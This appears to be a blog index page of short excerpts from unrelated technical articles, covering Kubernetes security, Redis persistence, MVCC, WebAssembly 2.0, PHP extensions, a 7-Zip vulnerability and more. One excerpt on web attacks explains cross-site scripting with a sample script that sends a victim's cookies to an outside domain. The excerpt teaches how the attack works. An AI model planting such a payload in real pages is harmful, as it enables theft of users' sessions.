Open vSwitch

Open vSwitch is an open source implementation of virtual switches. Widely used in the cloud computing industry to provide network administrators with visibility and control of traffic between and within virtual cloud hosts, Open vSwitch is designed to solve network problems with a virtualization solution that works with controller software to enable distributed virtual switching technology. This means that the switch and controller software can create clustered network configurations across

Kubernetes Best Practices Guide for Security

For most Kubernetes users, security is either irrelevant or not that important, and even when it is considered, it is only perfunctory. In fact, Kubernetes offers a wide range of options that can greatly improve the security of your application, and if you use them well, you can keep most attacks at bay. To make it easier to get started, I’ve summarized them into a few best practice configurations that you can use once you’ve read them.

Father of GNU Project: Apple turns Mac into a "prison" | Ubuntu is not free GNU/Linux distributions are not recommended

On April 13, Richard Stallman, the father of the GNU project and founder of the Free Software Foundation (FSF), spoke about the current state of open source software in the industry during his keynote address, “The State of the Free Software Movement. He also focused on “bashing” Apple and Ubuntu. Stallman says that Apple is continuing to turn the Mac into a “prison” – preventing users from doing what they want on their devices, such as installing their own programs or getting binaries from others.

Node version manager: nvm and n difference

Among the version management tools for node, nvm is naturally well known, but we cannot forget n from TJ. These two, are the most mainstream solutions at the moment. For more information on how to install and use these two tools, please see their respective homepages. creationix/nvm TJ Next we focus on the operation and characteristics of nvm and n. n n depends on node n is an npm package that needs to be installed globally.

Common Web Attack Means

1. Cross-site scripting attacks Concept Cross-Site Scripting (XSS) , which can inject code into the web pages that users browse, such code includes HTML and JavaScript. Principle of the attack For example, there is a forum site on which an attacker could post the following. 1 <script>location.href="//domain.com/?c=" + document.cookie</script> The content may then be rendered in the following form. 1 <p><script>location.href="//domain.com/?c=" + document.cookie</script></p> Another user viewing a page with this content will be redirected to domain.

MVCC in Mysql

What exactly is MVCC? Definition: Multi-Version Concurrency Control , literally, the use of multiple versions for reasonable control during concurrency (that’s how I took it literally anyway), obviously this thing is an abstract concept, and it is. It is mainly found in some data management software. Maintaining multiple versions of a data makes the read and write operations conflict-free. Why is this thing there? We all know that the data

W3C released the first draft of WebAssembly 2.0

The W3C today published the first Public Working Drafts (PWDs) of WebAssembly 2.0, consisting of 3 parts. WebAssembly Core Specification - Version 2.0: describes the 2.0 version of the WebAssembly core standard version 2.0 of the WebAssembly core standard, a secure, portable underlying code format designed to execute efficiently and provide a compact representation WebAssembly JavaScript Interface - Version 2.0: provides an explicit JavaScript API for interacting with WebAssembly WebAssembly Web API - Version 2.

The difference between AOF and RDB persistence

AOF and RDB persistence process review From the previous two articles we know some details of AOF and RDB persistence. In this article, let’s compare and contrast what persistence method is better for what environment? First we review the process of the two persistence methods. AOF Persistence Process AOF persistence is similar to Mysql’s binlog log, which records all modified operations, and all commands sent by the client are appended and saved in Redis command protocol format, to ensure proper file size, Redis also rewrites the AOF file in the background by sub-process creation, so that the AOF file size does not exceed the actual capitalization required to save the dataset state, and Note that Redis gives preference to AOF files to restore data when the server is started by executing these commands, because AOF text saves a more complete dataset than RDB does, and the stored files are generally larger than RDB files.

Redis' RDB persistence principle

Redis provides two persistence mechanisms, RDB and AOF. This chapter first describes how the Redis server saves and loads RDB files, focusing on the implementation of the SVAE and BGSAVE commands. After that, the chapter continues with a description of how the Redis server’s auto-save feature is implemented. The components are described, and the structure and meaning of these components are explained. At the end of this chapter, we will

Redis' AOF persistence principle

Redis provides two separate persistence mechanisms, RDB and AOF. This chapter first describes how the AOF feature works, how commands are stored in AOF files, and how different AOF storage modes affect data security and Redis performance. After that, we will introduce the method of restoring the database state from the AOF file and the implementation mechanism behind the method. Some pseudo-code will also be used to facilitate understanding. This

Efficient IO Technology - Zero Copy

This technique is used for IO operations, which consume a lot of CPU performance. Why IO operations can easily become a performance bottleneck? Every IO operation involves a conversion between the kernel space and user space of the operating system, and the real IO operations are actually performed in the kernel space of the operating system. Whether it is file IO, or network IO, in the end it can be unified as an exchange of user-space and kernel-space data.

Security vulnerability that can be triggered by dragging a file, affects all versions

7-Zip is an open source decompression software, mainly used on Microsoft Windows operating systems. 7-Zip’s authors released the first official version for Linux last March, allowing Linux users to use the official 7-Zip development to replace the ageing p7zip. Recently, researcher Kağan Çapar discovered a vulnerability in 7-Zip that could lead to hackers being granted elevated privileges and executing arbitrary commands. The CVE ID of the vulnerability is CVE-2022-29072 and it affects all versions of 7-Zip, including the current version 21.

PHP underlying operating mechanism and principle analysis

PHP is simple, but it’s not easy to master. In addition to knowing how to use it, we also need to know how it works under the hood. What is the purpose of understanding the underlying implementation of PHP? To use a dynamic language well, we must first understand it, the memory management and framework model is worth learning from, and we can optimize the performance of our programs by

Writing extensions to PHP 7.4

This article is based on PHP7.4 and explains how to create a PHP extension from scratch. This article will explain the basic steps to create an extension. In the example, we will implement the following functionality. 1 2 3 <?php echo hello(); Output content: 1 2 3 // $ php74 ./hello.php $ hello word Implement a hello method in the extension to output hello word! after calling the hello method.

Software running mechanism and memory management

The core function of an operating system is software governance, and a very important part of software governance is to allow multiple software to work together to use the computer’s resources rationally and without contention. Memory, as the most basic hardware resource of a computer, has a very special position. We know that the CPU can directly access very few storage resources, only: registers, memory (RAM), ROM on the motherboard.

About Memory Alignment

Computer memory is divided in bytes, so in theory the CPU can access any number of bytes, but in practice this is not the case. For a CPU with a data bus width of 32 bits, the actual addressing step is 4 bytes, which means that only memory numbered in multiples of 4 is addressed, such as 0, 4, 8, 12, 1000, and so on, but not memory numbered 1,

How to improve the security of Docker containers

With the rise of Docker, more and more projects use Docker to build production environments, because the container is light enough to quickly start and migrate business services, but in the process of using, we can easily ignore the project security issues, although the container has the role of isolation, but we know that he and the virtual machine architecture gap is still relatively large. Virtual machine by adding Hypervisor layer, virtualized Network card, memory, CPU and other virtual hardware, and then build virtual machines on it, each virtual machine has its own system kernel.

Four ways to use Controller Runtime

As the cloud-native ecosystem continues to evolve, most of the current Kubernetes-based cloud-native technologies almost always adopt the CRD + Controller model. Even without a custom CRD, there will be a need for a controller to detect resources of interest and do the work required by the business when their state changes. controller-runtime is a relatively good tool provided by the Kubernetes community to quickly build a set of watch for ApiServer.

5 New JavaScript Features You Must Learn

JavaScript is constantly being upgraded and iterated, and there are more and more new features to make our code simple and interesting to write, this article will introduce 5 new features, let’s study them together. 1. Use “Object.hasOwn” instead of the “in” operator Sometimes, we want to know if a property exists on an object, we usually use the “in” operator or “obj.hasOwnProperty”, but they both have their own drawbacks.

A PaaS system powered by Kubernetes - Porter

Porter is a Kubernetes-powered PaaS system that runs in your own cloud provider. porter tries to bring the Heroku experience to your own AWS/GCP account while upgrading your infrastructure to Kubernetes. Overview A traditional PaaS like Heroku is great for minimizing unnecessary DevOps efforts, but it doesn’t provide enough flexibility as applications grow. Custom network rules, resource constraints, and cost are common reasons for developers to move their applications away from Heroku.